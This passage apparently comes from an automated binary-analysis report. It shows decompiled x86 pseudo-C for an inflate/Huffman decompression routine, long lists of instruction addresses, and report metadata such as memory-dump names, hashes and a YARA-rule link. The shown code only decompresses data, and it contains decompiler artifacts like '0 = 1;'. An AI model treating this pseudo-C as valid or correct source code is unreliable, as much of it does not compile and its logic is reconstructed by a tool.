											}
											__eflags = __eax;
											 *(__ebp - 0x2c) = __eax;
											if(__eax != 0) {
												goto L48;
											} else {
												goto L38;
											}
										case 0xb:
											goto L56;
										case 0xc:
											L60:
											__esi[1] = __esi[1] >> 0xa;
											__eax = (__esi[1] >> 0xa) + 4;
											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
												goto L68;
											}
											goto L61;
										case 0xd:
											while(1) {
												L93:
												__eax = __esi[1];
												__ecx = __esi[2];
												__edx = __eax;
												__eax = __eax & 0x0000001f;
												__edx = __edx >> 5;
												__eax = __edx + __eax + 0x102;
												__eflags = __esi[2] - __eax;
												if(__esi[2] >= __eax) {
													break;
												}
												L73:
												__eax = __esi[0x143];
												while(1) {
													L76:
													__eflags = __ebx - __eax;
													if(__ebx >= __eax) {
														break;
													}
													L74:
													__eflags =  *(__ebp - 0x34);
													if( *(__ebp - 0x34) == 0) {
														goto L182;
													}
													L75:
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
													__ecx = __ebx;
													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
													__ebx = __ebx + 8;
													__eflags = __ebx;
												}
												L77:
												__eax =  *(0x40a408 + __eax * 2) & 0x0000ffff;
												__eax = __eax &  *(__ebp - 0x40);
												__ecx = __esi[0x144];
												__eax = __esi[0x144] + __eax * 4;
												__edx =  *(__eax + 1) & 0x000000ff;
												__eax =  *(__eax + 2) & 0x0000ffff;
												__eflags = __eax - 0x10;
												 *(__ebp - 0x14) = __eax;
												if(__eax >= 0x10) {
													L79:
													__eflags = __eax - 0x12;
													if(__eax != 0x12) {
														__eax = __eax + 0xfffffff2;
														 *(__ebp - 8) = 3;
													} else {
														_push(7);
														 *(__ebp - 8) = 0xb;
														_pop(__eax);
													}
													while(1) {
														L84:
														__ecx = __eax + __edx;
														__eflags = __ebx - __eax + __edx;
														if(__ebx >= __eax + __edx) {
															break;
														}
														L82:
														__eflags =  *(__ebp - 0x34);
														if( *(__ebp - 0x34) == 0) {
															goto L182;
														}
														L83:
														__ecx =  *(__ebp - 0x38);
														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
														__ecx = __ebx;
														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
														__ebx = __ebx + 8;
														__eflags = __ebx;
													}
													L85:
													__ecx = __edx;
													__ebx = __ebx - __edx;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													 *(0x40a408 + __eax * 2) & 0x0000ffff =  *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
													__edx =  *(__ebp - 8);
													__ebx = __ebx - __eax;
													__edx =  *(__ebp - 8) + ( *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
													__ecx = __eax;
													__eax = __esi[1];
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													__ecx = __esi[2];
													__eax = __eax >> 5;
													__edi = __eax >> 0x00000005 & 0x0000001f;
													__eax = __eax & 0x0000001f;
													__eax = __edi + __eax + 0x102;
													__edi = __edx + __ecx;
													__eflags = __edx + __ecx - __eax;
													if(__edx + __ecx > __eax) {
														goto L9;
													}
													L86:
													__eflags =  *(__ebp - 0x14) - 0x10;
													if( *(__ebp - 0x14) != 0x10) {
														L89:
														__edi = 0;
														__eflags = 0;
														L90:
														__eax = __esi + 0xc + __ecx * 4;
														do {
															L91:
															 *__eax = __edi;
															__ecx = __ecx + 1;
															__eax = __eax + 4;
															__edx = __edx - 1;
															__eflags = __edx;
														} while (__edx != 0);
														__esi[2] = __ecx;
														continue;
													}
													L87:
													__eflags = __ecx - 1;
													if(__ecx < 1) {
														goto L9;
													}
													L88:
													__edi =  *(__esi + 8 + __ecx * 4);
													goto L90;
												}
												L78:
												__ecx = __edx;
												__ebx = __ebx - __edx;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
												__ecx = __esi[2];
												 *(__esi + 0xc + __esi[2] * 4) = __eax;
												__esi[2] = __esi[2] + 1;
											}
											L94:
											__eax = __esi[1];
											__esi[0x144] = __esi[0x144] & 0x00000000;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
											__edi = __eax;
											__eax = __eax >> 5;
											__edi = __edi & 0x0000001f;
											__ecx = 0x101;
											__eax = __eax & 0x0000001f;
											__edi = __edi + 0x101;
											__eax = __eax + 1;
											__edx = __ebp - 0xc;
											 *(__ebp - 0x14) = __eax;
											 &(__esi[0x148]) = __ebp - 4;
											 *(__ebp - 4) = 9;
											__ebp - 0x18 =  &(__esi[3]);
											 *(__ebp - 0x10) = 6;
											__eax = E0040711C( &(__esi[3]), __edi, 0x101, 0x40841c, 0x40845c, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
											__eflags =  *(__ebp - 4);
											if( *(__ebp - 4) == 0) {
												__eax = __eax | 0xffffffff;
												__eflags = __eax;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L9;
											} else {
												L97:
												__ebp - 0xc =  &(__esi[0x148]);
												__ebp - 0x10 = __ebp - 0x1c;
												__eax = __esi + 0xc + __edi * 4;
												__eax = E0040711C(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x40849c, 0x4084d8, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
												__eflags = __eax;
												if(__eax != 0) {
													goto L9;
												}
												L98:
												__eax =  *(__ebp - 0x10);
												__eflags =  *(__ebp - 0x10);
												if( *(__ebp - 0x10) != 0) {
													L100:
													__cl =  *(__ebp - 4);
													 *__esi =  *__esi & 0x00000000;
													__eflags =  *__esi;
													__esi[4] = __al;
													__eax =  *(__ebp - 0x18);
													__esi[5] =  *(__ebp - 0x18);
													__eax =  *(__ebp - 0x1c);
													__esi[4] = __cl;
													__esi[6] =  *(__ebp - 0x1c);
													goto L101;
												}
												L99:
												__eflags = __edi - 0x101;
												if(__edi > 0x101) {
													goto L9;
												}
												goto L100;
											}
										case 0xe:
											goto L9;
										case 0xf:
											L175:
											__eax =  *(__ebp - 0x30);
											__esi[0x26ea] =  *(__ebp - 0x30);
											__eax = E004070B4( *((intOrPtr*)(__ebp + 8)));
											__ecx = __esi[0x26ea];
											__edx = __esi[0x26e9];
											__eflags = __ecx - __edx;
											 *(__ebp - 0x30) = __ecx;
											if(__ecx >= __edx) {
												__eax = __esi[0x26e8];
												__eax = __esi[0x26e8] - __ecx;
												__eflags = __eax;
											} else {
												__edx = __edx - __ecx;
												__eax = __edx - __ecx - 1;
											}
											__eflags = __ecx - __edx;
											 *(__ebp - 0x2c) = __eax;
											if(__ecx != __edx) {
												L183:
												__edi = 0;
												goto L10;
											} else {
												L179:
												__eax = __esi[0x145];
												__eflags = __eax - 8;
												 *__esi = __eax;
												if(__eax != 8) {
													L184:
													0 = 1;
													goto L10;
												}
												goto L180;
											}
									}
								}
								L181:
								goto L9;
							}
							L70:
							if( *__edi == __eax) {
								goto L72;
							}
							L71:
							__esi[2] = __esi[2] & __eax;
							 *__esi = 0xd;
							goto L93;
						}
					}
				}
				L182:
				_t443 = 0;
				_t446[0x147] =  *(_t448 - 0x40);
				_t446[0x146] = _t425;
				( *(_t448 + 8))[1] = 0;
				goto L11;
			}









                0x00406945
                0x00406945
                0x00406945
                0x00406945
                0x00406945
                0x00406949
                0x00000000
                0x00000000
                0x0040694f
                0x0040694f
                0x00406952
                0x00406955
                0x0040695a
                0x0040695c
                0x0040695f
                0x00406962
                0x00406965
                0x00406965
                0x00406968
                0x00000000
                0x00000000
                0x0040696a
                0x0040696a
                0x0040696d
                0x00406972
                0x00406974
                0x00406977
                0x0040697d
                0x004066dc
                0x004066dc
                0x004066df
                0x004066e5
                0x004066eb
                0x004066f4
                0x004066fa
                0x004066fd
                0x00406704
                0x00406709
                0x0040670f
                0x0040671a
                0x0040671a
                0x00406983
                0x00406983
                0x0040698d
                0x00000000
                0x00000000
                0x00406993
                0x00406993
                0x00406997
                0x0040699a
                0x0040699a
                0x0040699e
                0x004069a4
                0x004069a4
                0x004069a7
                0x004069aa
                0x004069b0
                0x00000000
                0x00000000
                0x004069b2
                0x004069d4
                0x004069d4
                0x004069d7
                0x00000000
                0x00000000
                0x004069b4
                0x004069b8
                0x00000000
                0x00000000
                0x004069be
                0x004069be
                0x004069c1
                0x004069c4
                0x004069c9
                0x004069cb
                0x004069ce
                0x004069d1
                0x004069d1
                0x004069d9
                0x004069d9
                0x004069df
                0x004069e2
                0x004069e5
                0x004069e5
                0x004069ec
                0x004069f0
                0x004069f4
                0x004069f7
                0x004069fa
                0x00406a00
                0x00406a05
                0x00000000
                0x00000000
                0x00406a07
                0x00406a1b
                0x00406a1b
                0x00406a1f
                0x00000000
                0x00000000
                0x00406a09
                0x00406a0c
                0x00406a0c
                0x00406a13
                0x00406a18
                0x00406a18
                0x00406a18
                0x00406a21
                0x00406a21
                0x00406a24
                0x00406a32
                0x00406a38
                0x00406a3d
                0x00406a43
                0x00406a49
                0x00406a4f
                0x00406a56
                0x00406a6a
                0x00406a6a
                0x00407039
                0x00407039
                0x00407039
                0x0040703e
                0x00000000
                0x00000000
                0x00406676
                0x00406676
                0x00000000
                0x00406c71
                0x00406c71
                0x00406c75
                0x00406c78
                0x00406c7b
                0x00406c7e
                0x00000000
                0x00000000
                0x00406c84
                0x00406c84
                0x00406ca9
                0x00406ca9
                0x00406ca9
                0x00406cab
                0x00000000
                0x00000000
                0x00406c89
                0x00406c89
                0x00406c8d
                0x00000000
                0x00000000
                0x00406c93
                0x00406c93
                0x00406c96
                0x00406c99
                0x00406c9c
                0x00406c9e
                0x00406ca0
                0x00406ca3
                0x00406ca6
                0x00406ca6
                0x00406ca6
                0x00406cad
                0x00406cad
                0x00406cb5
                0x00406cb8
                0x00406cbb
                0x00406cbe
                0x00406cc2
                0x00406cc5
                0x00406cc7
                0x00406cca
                0x00406ccc
                0x00406ce0
                0x00406ce0
                0x00406ce3
                0x00406cfd
                0x00406cfd
                0x00406d00
                0x00000000
                0x00000000
                0x00406d06
                0x00406d06
                0x00406d09
                0x00000000
                0x00000000
                0x00406d0f
                0x00406d0f
                0x00000000
                0x00406d0f
                0x00406ce5
                0x00406ce8
                0x00406cef
                0x00406cf2
                0x00000000
                0x00406cf2
                0x00406cce
                0x00406cd2
                0x00406cd5
                0x00000000
                0x00000000
                0x00406d1a
                0x00406d1a
                0x00406d3f
                0x00406d3f
                0x00406d3f
                0x00406d41
                0x00000000
                0x00000000
                0x00406d1f
                0x00406d1f
                0x00406d23
                0x00000000
                0x00000000
                0x00406d29
                0x00406d29
                0x00406d2c
                0x00406d2f
                0x00406d32
                0x00406d34
                0x00406d36
                0x00406d39
                0x00406d3c
                0x00406d3c
                0x00406d3c
                0x00406d43
                0x00406d4b
                0x00406d4e
                0x00406d51
                0x00406d53
                0x00406d56
                0x00406d56
                0x00406d58
                0x00406d5c
                0x00406d5f
                0x00406d62
                0x00406d65
                0x00000000
                0x00000000
                0x00406d6b
                0x00406d6b
                0x00406d90
                0x00406d90
                0x00406d90
                0x00406d92
                0x00000000
                0x00000000
                0x00406d70
                0x00406d70
                0x00406d74
                0x00000000
                0x00000000
                0x00406d7a
                0x00406d7a
                0x00406d7d
                0x00406d80
                0x00406d83
                0x00406d85
                0x00406d87
                0x00406d8a
                0x00406d8d
                0x00406d8d
                0x00406d8d
                0x00406d94
                0x00406d94
                0x00406d9c
                0x00406d9f
                0x00406da2
                0x00406da5
                0x00406da9
                0x00406dac
                0x00406dae
                0x00406db1
                0x00406db4
                0x00406dce
                0x00406dce
                0x00406dd1
                0x00000000
                0x00000000
                0x00406dd7
                0x00406dd7
                0x00406dda
                0x00406de1
                0x00000000
                0x00406de1
                0x00406db6
                0x00406db9
                0x00406dc0
                0x00406dc3
                0x00000000
                0x00000000
                0x00406de9
                0x00406de9
                0x00406e0e
                0x00406e0e
                0x00406e0e
                0x00406e10
                0x00000000
                0x00000000
                0x00406dee
                0x00406dee
                0x00406df2
                0x00000000
                0x00000000
                0x00406df8
                0x00406df8
                0x00406dfb
                0x00406dfe
                0x00406e01
                0x00406e03
                0x00406e05
                0x00406e08
                0x00406e0b
                0x00406e0b
                0x00406e0b
                0x00406e12
                0x00406e1a
                0x00406e1d
                0x00406e20
                0x00406e22
                0x00406e25
                0x00406e25
                0x00406e27
                0x00000000
                0x00000000
                0x00406e2d
                0x00406e2d
                0x00406e30
                0x00406e35
                0x00406e37
                0x00406e3d
                0x00406e3f
                0x00406e54
                0x00406e56
                0x00406e56
                0x00406e41
                0x00406e47
                0x00406e49
                0x00406e4b
                0x00406e4b
                0x00406e58
                0x00406e5c
                0x00406e5f
                0x00406e65
                0x00406e65
                0x00406e68
                0x00406e68
                0x00406e68
                0x00406e6a
                0x00000000
                0x00000000
                0x00406e70
                0x00406e70
                0x00406e76
                0x00406e78
                0x00406e9d
                0x00406ea0
                0x00406ea6
                0x00406eab
                0x00406eb1
                0x00406eb7
                0x00406eb9
                0x00406ebc
                0x00406ec5
                0x00406ecb
                0x00406ecb
                0x00406ebe
                0x00406ec0
                0x00406ec2
                0x00406ec2
                0x00406ecd
                0x00406ed3
                0x00406ed5
                0x00406ed8
                0x00406eda
                0x00406ee0
                0x00406ee2
                0x00406ee4
                0x00406ee6
                0x00406ee8
                0x00406eeb
                0x00406ef4
                0x00406ef7
                0x00406ef7
                0x00406eed
                0x00406eed
                0x00406ef0
                0x00406ef0
                0x00406eeb
                0x00406ee2
                0x00406ef9
                0x00406efb
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406efb
                0x00406e7a
                0x00406e7a
                0x00406e80
                0x00406e86
                0x00406e88
                0x00000000
                0x00000000
                0x00406e8a
                0x00406e8a
                0x00406e8c
                0x00406e8e
                0x00406e97
                0x00406e97
                0x00406e90
                0x00406e90
                0x00406e93
                0x00406e93
                0x00406e99
                0x00406e9b
                0x00000000
                0x00000000
                0x00406f01
                0x00406f01
                0x00406f06
                0x00406f08
                0x00406f09
                0x00406f0a
                0x00406f0b
                0x00406f11
                0x00406f14
                0x00406f17
                0x00406f1a
                0x00406f1c
                0x00406f22
                0x00406f22
                0x00406f25
                0x00406f25
                0x00406f25
                0x00406f25
                0x00406f2e
                0x00000000
                0x00000000
                0x00406f33
                0x00406f33
                0x00406f36
                0x00406f39
                0x00406f3b
                0x00406fd2
                0x00406fd2
                0x00406fd5
                0x00406fd7
                0x00406fd8
                0x00406fd9
                0x00406fdc
                0x00000000
                0x00406fdc
                0x00406f41
                0x00406f41
                0x00406f47
                0x00406f49
                0x00406f6e
                0x00406f71
                0x00406f77
                0x00406f7c
                0x00406f82
                0x00406f88
                0x00406f8a
                0x00406f8d
                0x00406f96
                0x00406f9c
                0x00406f9c
                0x00406f8f
                0x00406f91
                0x00406f93
                0x00406f93
                0x00406f9e
                0x00406fa4
                0x00406fa6
                0x00406fa9
                0x00406fab
                0x00406fb1
                0x00406fb3
                0x00406fb5
                0x00406fb7
                0x00406fb9
                0x00406fbc
                0x00406fc5
                0x00406fc8
                0x00406fc8
                0x00406fbe
                0x00406fbe
                0x00406fc1
                0x00406fc1
                0x00406fbc
                0x00406fb3
                0x00406fca
                0x00406fcc
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406fcc
                0x00406f4b
                0x00406f4b
                0x00406f51
                0x00406f57
                0x00406f59
                0x00000000
                0x00000000
                0x00406f5b
                0x00406f5b
                0x00406f5d
                0x00406f5f
                0x00406f66
                0x00406f66
                0x00406f68
                0x00406f61
                0x00406f61
                0x00406f63
                0x00406f63
                0x00406f6a
                0x00406f6c
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406fe4
                0x00406fe4
                0x00406fe7
                0x00406fe9
                0x00406fec
                0x00406fef
                0x00406fef
                0x00406fef
                0x00406fef
                0x00000000
                0x00000000
                0x00000000
                0x0040669d
                0x00406681
                0x00000000
                0x00406687
                0x0040668a
                0x00406694
                0x00406697
                0x0040669a
                0x00000000
                0x0040669a
                0x00406681
                0x004066a5
                0x004066a8
                0x004066ac
                0x004066b6
                0x004066c0
                0x004066c3
                0x004066c9
                0x004067fd
                0x004067ff
                0x00406805
                0x00406808
                0x0040680b
                0x00000000
                0x0040680b
                0x004066cf
                0x004066cf
                0x004066d0
                0x00406728
                0x00406728
                0x0040672f
                0x004067d5
                0x004067d5
                0x004067da
                0x004067dd
                0x004067e2
                0x004067e5
                0x004067ea
                0x004067ed
                0x004067f2
                0x004067f5
                0x004067f5
                0x00000000
                0x00406735
                0x00406735
                0x00406735
                0x00406735
                0x00406739
                0x00406739
                0x0040675b
                0x0040675e
                0x00406760
                0x00406763
                0x00406768
                0x0040673e
                0x0040673e
                0x00406743
                0x00406745
                0x00406747
                0x0040674c
                0x00406752
                0x00406757
                0x00406759
                0x00406759
                0x0040674e
                0x0040674e
                0x0040674e
                0x0040674c
                0x00000000
                0x0040676a
                0x00406797
                0x0040679c
                0x0040679e
                0x0040679f
                0x004067a1
                0x004067a2
                0x004067a2
                0x004067a2
                0x004067ca
                0x004067cf
                0x004067cf
                0x00000000
                0x004067cf
                0x00406768
                0x0040672f
                0x004066d2
                0x004066d2
                0x004066d3
                0x0040671d
                0x00000000
                0x0040671d
                0x004066d5
                0x004066d6
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406832
                0x00406832
                0x00406832
                0x00406835
                0x00000000
                0x00000000
                0x00406812
                0x00406812
                0x00406816
                0x00000000
                0x00000000
                0x0040681c
                0x0040681c
                0x0040681f
                0x00406822
                0x00406827
                0x00406829
                0x0040682c
                0x0040682f
                0x0040682f
                0x0040682f
                0x00406837
                0x00406837
                0x0040683a
                0x0040683c
                0x00406841
                0x00406844
                0x00406846
                0x00406849
                0x00000000
                0x00000000
                0x0040684f
                0x0040684f
                0x00406851
                0x00000000
                0x00000000
                0x00406857
                0x00406857
                0x0040685b
                0x00000000
                0x00000000
                0x00406861
                0x00406861
                0x00406864
                0x00406866
                0x00406904
                0x00406904
                0x00406907
                0x00406909
                0x00406909
                0x0040690c
                0x0040690f
                0x00406911
                0x00406913
                0x00406915
                0x00406915
                0x0040691e
                0x00406923
                0x00406926
                0x00406929
                0x0040692c
                0x0040692f
                0x0040692f
                0x0040692f
                0x00406932
                0x00406938
                0x00406938
                0x0040693e
                0x0040693e
                0x0040693e
                0x00000000
                0x00406932
                0x0040686c
                0x0040686c
                0x00406872
                0x00406875
                0x00406877
                0x004068a2
                0x004068a5
                0x004068ab
                0x004068b0
                0x004068b6
                0x004068bc
                0x004068be
                0x004068c1
                0x004068ca
                0x004068d0
                0x004068d0
                0x004068c3
                0x004068c5
                0x004068c7
                0x004068c7
                0x004068d2
                0x004068d8
                0x004068db
                0x004068dd
                0x004068df
                0x004068e5
                0x004068e7
                0x004068e9
                0x004068ec
                0x004068f5
                0x004068f5
                0x004068f7
                0x004068ee
                0x004068ee
                0x004068f1
                0x004068f1
                0x004068f9
                0x004068f9
                0x004068e7
                0x004068fc
                0x004068fe
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004068fe
                0x00406879
                0x00406879
                0x0040687f
                0x00406885
                0x00406887
                0x00000000
                0x00000000
                0x00406889
                0x00406889
                0x0040688b
                0x0040688d
                0x00406890
                0x00406897
                0x00406897
                0x00406899
                0x00406892
                0x00406892
                0x00406894
                0x00406894
                0x0040689b
                0x0040689d
                0x004068a0
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004069a4
                0x004069a7
                0x004069aa
                0x004069b0
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406b87
                0x00406b87
                0x00406b87
                0x00406b8a
                0x00406b8d
                0x00406b8f
                0x00406b92
                0x00406b98
                0x00406b9f
                0x00406ba1
                0x00000000
                0x00000000
                0x00406a75
                0x00406a75
                0x00406a9d
                0x00406a9d
                0x00406a9d
                0x00406a9f
                0x00000000
                0x00000000
                0x00406a7d
                0x00406a7d
                0x00406a81
                0x00000000
                0x00000000
                0x00406a87
                0x00406a87
                0x00406a8a
                0x00406a8d
                0x00406a90
                0x00406a92
                0x00406a94
                0x00406a97
                0x00406a9a
                0x00406a9a
                0x00406a9a
                0x00406aa1
                0x00406aa1
                0x00406aa9
                0x00406aac
                0x00406ab2
                0x00406ab5
                0x00406ab9
                0x00406abd
                0x00406ac0
                0x00406ac3
                0x00406adb
                0x00406adb
                0x00406ade
                0x00406aec
                0x00406aef
                0x00406ae0
                0x00406ae0
                0x00406ae2
                0x00406ae9
                0x00406ae9
                0x00406b18
                0x00406b18
                0x00406b18
                0x00406b1b
                0x00406b1d
                0x00000000
                0x00000000
                0x00406af8
                0x00406af8
                0x00406afc
                0x00000000
                0x00000000
                0x00406b02
                0x00406b02
                0x00406b05
                0x00406b08
                0x00406b0b
                0x00406b0d
                0x00406b0f
                0x00406b12
                0x00406b15
                0x00406b15
                0x00406b15
                0x00406b1f
                0x00406b1f
                0x00406b21
                0x00406b23
                0x00406b2e
                0x00406b31
                0x00406b34
                0x00406b36
                0x00406b38
                0x00406b3a
                0x00406b3d
                0x00406b40
                0x00406b45
                0x00406b48
                0x00406b4b
                0x00406b4e
                0x00406b55
                0x00406b58
                0x00406b5a
                0x00000000
                0x00000000
                0x00406b60
                0x00406b60
                0x00406b64
                0x00406b75
                0x00406b75
                0x00406b75
                0x00406b77
                0x00406b77
                0x00406b7b
                0x00406b7b
                0x00406b7b
                0x00406b7d
                0x00406b7e
                0x00406b81
                0x00406b81
                0x00406b81
                0x00406b84
                0x00000000
                0x00406b84
                0x00406b66
                0x00406b66
                0x00406b69
                0x00000000
                0x00000000
                0x00406b6f
                0x00406b6f
                0x00000000
                0x00406b6f
                0x00406ac5
                0x00406ac5
                0x00406ac7
                0x00406ac9
                0x00406acc
                0x00406acf
                0x00406ad3
                0x00406ad3
                0x00406ba7
                0x00406ba7
                0x00406baa
                0x00406bb1
                0x00406bb5
                0x00406bb7
                0x00406bba
                0x00406bbd
                0x00406bc2
                0x00406bc5
                0x00406bc7
                0x00406bc8
                0x00406bcb
                0x00406bd6
                0x00406bd9
                0x00406bf0
                0x00406bf5
                0x00406bfc
                0x00406c01
                0x00406c05
                0x00406c07
                0x00406c07
                0x00406c07
                0x00406c0a
                0x00406c0c
                0x00000000
                0x00406c12
                0x00406c12
                0x00406c16
                0x00406c21
                0x00406c34
                0x00406c39
                0x00406c3e
                0x00406c40
                0x00000000
                0x00000000
                0x00406c46
                0x00406c46
                0x00406c49
                0x00406c4b
                0x00406c59
                0x00406c59
                0x00406c5c
                0x00406c5c
                0x00406c5f
                0x00406c62
                0x00406c65
                0x00406c68
                0x00406c6b
                0x00406c6e
                0x00000000
                0x00406c6e
                0x00406c4d
                0x00406c4d
                0x00406c53
                0x00000000
                0x00000000
                0x00000000
                0x00406c53
                0x00000000
                0x00000000
                0x00000000
                0x00406ff2
                0x00406ff2
                0x00406ff8
                0x00406ffe
                0x00407003
                0x00407009
                0x0040700f
                0x00407011
                0x00407014
                0x0040701d
                0x00407023
                0x00407023
                0x00407016
                0x00407018
                0x0040701a
                0x0040701a
                0x00407025
                0x00407027
                0x0040702a
                0x00407065
                0x00407065
                0x00000000
                0x0040702c
                0x0040702c
                0x0040702c
                0x00407032
                0x00407035
                0x00407037
                0x0040706c
                0x0040706e
                0x00000000
                0x0040706e
                0x00000000
                0x00407037
                0x00000000
                0x00406676
                0x00407044
                0x00000000
                0x00407044
                0x00406a58
                0x00406a5a
                0x00000000
                0x00000000
                0x00406a5c
                0x00406a5c
                0x00406a5f
                0x00000000
                0x00406a5f
                0x004069a4
                0x00406965
                0x00407049
                0x0040704c
                0x0040704e
                0x00407057
                0x0040705d
                0x00000000

                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
                • Instruction ID: f64ed9f862d89b69eb15ddc430260785fe10463149b241517d112065bf602f9e
                • Opcode Fuzzy Hash: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
                • Instruction Fuzzy Hash: 57E19BB190070ACFDB24CF59C880BAAB7F5EB45305F15892EE497A7291D378AA51CF14
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040711C, Relevance: .3, Instructions: 300COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 100%
                			E0040711C(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v116;
				signed int _v176;
				signed int _v180;
				signed int _v240;
				signed int _t166;
				signed int _t168;
				intOrPtr _t175;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				signed int* _t184;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				signed int _t195;
				signed int _t200;
				signed int _t205;
				void* _t207;
				short _t208;
				signed char _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				signed int _t236;
				signed int _t244;
				signed int _t246;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				signed int _t259;
				signed int _t262;
				void* _t263;
				void* _t264;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				void* _t277;
				signed int _t278;
				intOrPtr* _t279;
				signed int _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int* _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t296;
				signed int* _t297;
				intOrPtr _t298;
				void* _t299;

				_t278 = _a8;
				_t187 = 0x10;
				memset( &_v116, 0, _t187 << 2);
				_t189 = _a4;
				_t233 = _t278;
				do {
					_t166 =  *_t189;
					_t189 =  &(_t189[1]);
					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				if(_v116 != _t278) {
					_t279 = _a28;
					_t267 =  *_t279;
					_t190 = 1;
					_a28 = _t267;
					_t234 = 0xf;
					while(1) {
						_t168 = 0;
						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
							break;
						}
						_t190 = _t190 + 1;
						if(_t190 <= _t234) {
							continue;
						}
						break;
					}
					_v8 = _t190;
					if(_t267 < _t190) {
						_a28 = _t190;
					}
					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
						_t234 = _t234 - 1;
						if(_t234 != 0) {
							continue;
						}
						break;
					}
					_v28 = _t234;
					if(_a28 > _t234) {
						_a28 = _t234;
					}
					 *_t279 = _a28;
					_t181 = 1 << _t190;
					while(_t190 < _t234) {
						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
						if(_t182 < 0) {
							L64:
							return _t168 | 0xffffffff;
						}
						_t190 = _t190 + 1;
						_t181 = _t182 + _t182;
					}
					_t281 = _t234 << 2;
					_t191 = _t299 + _t281 - 0x70;
					_t269 =  *_t191;
					_t183 = _t181 - _t269;
					_v52 = _t183;
					if(_t183 < 0) {
						goto L64;
					}
					_v176 = _t168;
					 *_t191 = _t269 + _t183;
					_t192 = 0;
					_t235 = _t234 - 1;
					if(_t235 == 0) {
						L21:
						_t184 = _a4;
						_t271 = 0;
						do {
							_t193 =  *_t184;
							_t184 =  &(_t184[1]);
							if(_t193 != _t168) {
								_t232 = _t299 + _t193 * 4 - 0xb0;
								_t236 =  *_t232;
								 *((intOrPtr*)(0x42d6a8 + _t236 * 4)) = _t271;
								 *_t232 = _t236 + 1;
							}
							_t271 = _t271 + 1;
						} while (_t271 < _a8);
						_v16 = _v16 | 0xffffffff;
						_v40 = _v40 & 0x00000000;
						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
						_t195 = _v8;
						_t186 =  ~_a28;
						_v12 = _t168;
						_v180 = _t168;
						_v36 = 0x42d6a8;
						_v240 = _t168;
						if(_t195 > _v28) {
							L62:
							_t168 = 0;
